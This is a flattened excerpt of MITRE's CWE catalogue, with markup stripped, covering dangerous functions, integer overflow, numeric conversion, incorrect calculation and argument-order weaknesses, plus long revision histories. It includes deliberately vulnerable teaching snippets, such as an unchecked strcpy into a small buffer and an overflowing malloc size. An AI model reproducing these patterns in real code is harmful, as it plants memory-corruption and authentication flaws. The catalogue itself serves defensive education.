ASCRM-CWE-674 + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs the same operation on a resource two or more times, when the operation should only be applied once. + + + + + + + + + + + Implementation + + + + + Other + Other + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This weakness is probably closely associated with other issues related to doubling, such as CWE-462 (duplicate key in alist) or CWE-102 (Struts duplicate validation forms). It's usually a case of an API contract violation (CWE-227). + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Duplicate Operations on Resource + + + + The product invokes a potentially dangerous function that could introduce a vulnerability if it is used incorrectly, but the function can also be used safely. + + + + + + Primary + + + Indirect + + + + + + + + + Implementation + + + High + + + Other + Varies by Context + Quality Degradation + Unexpected State + If the function is used incorrectly, then it could result in security problems. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + Cost effective for partial coverage: + + Binary / Bytecode Quality Analysis + Binary / Bytecode simple extractor - strings, ELF readers, etc. + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Debugger + + Cost effective for partial coverage: + + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + Cost effective for partial coverage: + + Warning Flags + Source Code Quality Analyzer + + + + High + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Origin Analysis + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Build and Compilation + Implementation + Identify a list of prohibited API functions and prohibit developers from using these functions, providing safer alternatives. In some cases, automatic code analysis tools or the compiler can be instructed to spot use of prohibited functions, such as the "banned.h" include file from Microsoft's SDL. [REF-554] [REF-7] + + + + + The following code attempts to create a local copy of a buffer to perform some manipulations to the data. + + void manipulate_string(char * string){char buf[24];strcpy(buf, string);...} + + However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter. + + + + + CVE-2007-1470 + Library has multiple buffer overflows using sprintf() and strcpy() + https://www.cve.org/CVERecord?id=CVE-2007-1470 + + + CVE-2009-3849 + Buffer overflow using strcat() + https://www.cve.org/CVERecord?id=CVE-2009-3849 + + + CVE-2006-2114 + Buffer overflow using strcpy() + https://www.cve.org/CVERecord?id=CVE-2006-2114 + + + CVE-2006-0963 + Buffer overflow using strcpy() + https://www.cve.org/CVERecord?id=CVE-2006-0963 + + + CVE-2011-0712 + Vulnerable use of strcpy() changed to use safer strlcpy() + https://www.cve.org/CVERecord?id=CVE-2011-0712 + + + CVE-2008-5005 + Buffer overflow using strcpy() + https://www.cve.org/CVERecord?id=CVE-2008-5005 + + + + + Dangerous Functions + + + CON33-C + Avoid race conditions when using library functions + CWE More Abstract + + + ENV33-C + Do not call system() + CWE More Abstract + + + ERR07-C + Prefer functions that support error checking over equivalent functions that don't + + + ERR34-C + Detect errors when converting a string to a number + CWE More Abstract + + + FIO01-C + Be careful using functions that use file names for identification + + + MSC30-C + Do not use the rand() function for generating pseudorandom numbers + CWE More Abstract + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + Imprecise + + + SFP3 + Use of an improper API + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This weakness is different than CWE-242 (Use of Inherently Dangerous Function). CWE-242 covers functions with such significant security problems that they can never be guaranteed to be safe. Some functions, if used properly, do not directly pose a security risk, but can introduce a weakness if not called correctly. These are regarded as potentially dangerous. A well-known example is the strcpy() function. When provided with a destination buffer that is larger than its source, strcpy() will not overflow. However, it is so often misused that some developers prohibit strcpy() entirely. + + + + 7 Pernicious Kingdoms + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Other_Notes, References, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs a calculation to determine how much memory to allocate, but an integer overflow can occur that causes less memory to be allocated than expected, leading to a buffer overflow. + + + + + + + + + + Integrity + Availability + Confidentiality + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + + + + + CVE-2017-1000121 + chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). + https://www.cve.org/CVERecord?id=CVE-2017-1000121 + + + + + INT30-C + Ensure that unsigned integer operations do not wrap + Imprecise + + + INT32-C + Ensure that operations on signed integers do not result in overflow + Imprecise + + + MEM35-C + Allocate sufficient memory for an object + CWE More Abstract + + + + + + + + + + + + + + + + + Discouraged + This CWE entry is a named chain, which combines multiple weaknesses. + Mapping to each separate weakness in the chain would be more precise. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Observed_Examples, Relationships, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur. + + + + + + + + + + + Implementation + + + High + + + Other + Integrity + Unexpected State + Quality Degradation + The program could wind up using the wrong number and generate incorrect results. If the number is used to allocate resources or make a security decision, then this could introduce a vulnerability. + + + + + Implementation + Avoid making conversion between numeric types. Always check for the allowed ranges. + + + + + In the following Java example, a float literal is cast to an integer, thus causing a loss of precision. + + int i = (int) 33457.8f; + + + + This code adds a float and an integer together, casting the result to an integer. + + $floatVal = 1.8345;$intVal = 3;$result = (int)$floatVal + $intVal; + + Normally, PHP will preserve the precision of this operation, making $result = 4.8345. After the cast to int, it is reasonable to expect PHP to follow rounding convention and set $result = 5. However, the explicit cast to int always rounds DOWN, so the final value of $result is 4. This behavior may have unintended consequences. + + + In this example the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned int, amount will be implicitly converted to unsigned. + + unsigned int readdata () {int amount = 0;...if (result == ERROR)amount = -1;...return amount;} + + If the error condition in the code above is met, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. + + + In this example, depending on the return value of accecssmainframe(), the variable amount can hold a negative value when it is returned. Because the function is declared to return an unsigned value, amount will be implicitly cast to an unsigned number. + + unsigned int readdata () {int amount = 0;...amount = accessmainframe();...return amount;} + + If the return value of accessmainframe() is -1, then the return value of readdata() will be 4,294,967,295 on a system that uses 32-bit integers. + + + + + CVE-2007-4268 + Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122) + https://www.cve.org/CVERecord?id=CVE-2007-4268 + + + CVE-2007-4988 + Chain: signed short width value in image processor is sign extended during conversion to unsigned int, which leads to integer overflow and heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2007-4988 + + + CVE-2009-0231 + Integer truncation of length value leads to heap-based buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2009-0231 + + + CVE-2008-3282 + Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated. + https://www.cve.org/CVERecord?id=CVE-2008-3282 + + + + + FLP34-C + Ensure that floating point conversions are within range of the new type + CWE More Abstract + + + INT15-C + Use intmax_t or uintmax_t for formatted IO on programmer-defined integer types + + + INT31-C + Ensure that integer conversions do not result in lost or misinterpreted data + CWE More Abstract + + + INT35-C + Evaluate integer expressions in a larger size before comparing or assigning to that size + + + NUM12-J + Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data + + + SFP1 + Glitch in computation + + + ASCSM-CWE-681 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2008-04-11 + Draft 9 + 2008-04-11 + Submitted by members of the CWE community to extend early CWE versions + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Likelihood_of_Exploit, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Observed_Examples, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs a calculation that generates incorrect or unintended results that are later used in security-critical decisions or resource management. + When product performs a security-critical calculation incorrectly, it might lead to incorrect resource allocations, incorrect privilege assignments, or failed comparisons among other things. Many of the direct results of an incorrect calculation can lead to even larger problems such as failed protection mechanisms or even arbitrary code execution. + + + + + + + + + + Implementation + + + High + + + Availability + DoS: Crash, Exit, or Restart + If the incorrect calculation causes the program to move into an unexpected state, it may lead to a crash or impairment of service. + + + Integrity + Confidentiality + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (Other) + Execute Unauthorized Code or Commands + If the incorrect calculation is used in the context of resource allocation, it could lead to an out-of-bounds operation (CWE-119) leading to a crash or even arbitrary code execution. Alternatively, it may result in an integer overflow (CWE-190) and / or a resource consumption problem (CWE-400). + + + Access Control + Gain Privileges or Assume Identity + In the context of privilege or permissions assignment, an incorrect calculation can provide an attacker with access to sensitive resources. + + + Access Control + Bypass Protection Mechanism + If the incorrect calculation leads to an insufficient comparison (CWE-697), it may compromise a protection mechanism such as a validation routine and allow an attacker to bypass the security-critical code. + + + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. + + High + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + + + Implementation + Understand your programming language's underlying representation and how it interacts with numeric calculation. Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how your language handles numbers that are too large or too small for its underlying representation. + + + Implementation + Input Validation + Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. + + + Implementation + Use the appropriate type for the desired action. For example, in C/C++, only use unsigned types for values that could never be negative, such as height, width, or other numbers related to quantity. + + + Architecture and Design + Language Selection + + Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences. + Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). + + + + Architecture and Design + Libraries or Frameworks + + Use languages, libraries, or frameworks that make it easier to handle numbers without unexpected consequences. + Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). + + + + Implementation + Compilation or Build Hardening + Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. + + + Testing + Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Testing + Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + + + The following image processing code allocates a table for images. + + img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... + + This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). + + + This code attempts to calculate a football team's average number of yards gained per touchdown. + + ...int touchdowns = team.getTouchdowns();int yardsGained = team.getTotalYardage();System.out.println(team.getName() + " averages " + yardsGained / touchdowns + "yards gained for every touchdown scored");... + + The code does not consider the event that the team they are querying has not scored a touchdown, but has gained yardage. In that case, we should expect an ArithmeticException to be thrown by the JVM. This could lead to a loss of availability if our error handling code is not set up correctly. + + + This example attempts to calculate the position of the second byte of a pointer. + + int *p = x;char * second_char = (char *)(p + 1); + + In this example, second_char is intended to point to the second byte of p. But, adding 1 to p actually adds sizeof(int) to p, giving a result that is incorrect (3 bytes off on 32-bit platforms). If the resulting memory address is read, this could potentially be an information leak. If it is a write, it could be a security-critical write to unauthorized memory-- whether or not it is a buffer overflow. Note that the above code may also be wrong in other ways, particularly in a little endian environment. + + + + + CVE-2020-0022 + chain: mobile phone Bluetooth implementation does not include offset when calculating packet length (CWE-682), leading to out-of-bounds write (CWE-787) + https://www.cve.org/CVERecord?id=CVE-2020-0022 + + + CVE-2004-1363 + substitution overflow: buffer overflow using environment variables that are expanded after the length check is performed + https://www.cve.org/CVERecord?id=CVE-2004-1363 + + + + + FLP32-C + Prevent or detect domain and range errors in math functions + CWE More Abstract + + + INT07-C + Use only explicitly signed or unsigned char type for numeric values + + + INT13-C + Use bitwise operators only on unsigned operands + + + INT33-C + Ensure that division and remainder operations do not result in divide-by-zero errors + CWE More Abstract + + + INT34-C + Do not shift an expression by a negative number of bits or by greater than or equal to the number of bits that exist in the operand + CWE More Abstract + + + + + + + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. In many cases, lower-level children or descendants are more appropriate. However, sometimes this weakness is forced to be used due to the lack of in-depth weakness research. See Research Gaps. + Where feasible, consider children or descendants of this entry instead. + + + + + + + Weaknesses related to this Pillar appear to be under-studied, especially with respect to classification schemes. Input from academic and other communities could help identify and resolve gaps or organizational difficulties within CWE. + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Type + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-04-05 + updated Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Observed_Examples, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Research_Gaps + + + + + The product calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses. + While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers or types of arguments, such as format strings in C. It also can occur in languages or environments that do not enforce strong typing. + + + + + + Primary + + + + + Implementation + This problem typically occurs when the programmer makes a typo, or copy and paste errors. + + + + + Other + Quality Degradation + + + + + Implementation + Use the function, procedure, or routine as specified. + + + Testing + Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the product. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. + + + + + The following PHP method authenticates a user given a username/password combination but is called with the parameters in reverse order. + + function authenticate($username, $password) { + + + // authenticate user + ... + } + authenticate($_POST['password'], $_POST['username']); + + + + + + CVE-2006-7049 + Application calls functions with arguments in the wrong order, allowing attacker to bypass intended access restrictions. + https://www.cve.org/CVERecord?id=CVE-2006-7049 + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code does not function according to its published specifications, potentially leading to incorrect usage. + When providing functionality to an external party, it is important that the product behaves in accordance with the details specified. When requirements of nuances are not documented, the functionality may produce unintended behaviors for the caller, possibly leading to an exploitable state. + + + + + + Indirect + + + Primary + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Implementation + Ensure that your code strictly conforms to specifications. + + + + + PRE09-C + Do not replace secure functions with less secure functions + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure to Provide Specified Functionality + + + + The product calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses. + + + + + + Primary + + + + + + + + + Implementation + This problem typically occurs when the programmer makes a typo, or copy and paste errors. + + + + + Other + Quality Degradation + + + + + Other + While this weakness might be caught by the compiler in some languages, it can occur more frequently in cases in which the called function accepts variable numbers of arguments, such as format strings in C. It also can occur in languages or environments that do not require that functions always be called with the correct number of arguments, such as Perl. + + + + + Testing + Because this function call often produces incorrect behavior it will usually be detected during testing or normal operation of the product. During testing exercise all possible control paths will typically expose this weakness except in rare cases when the incorrect function call accidentally produces the correct results or if the provided argument type is very similar to the expected argument type. + + + + + SFP1 + Glitch in computation + + + EXP37-C + Call functions with the correct number and type of arguments + CWE More Specific + + + FIO47-C + Use valid format strings + Imprecise + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Detection_Factors, Relationships, Other_Notes, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Modes_of_Introduction, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 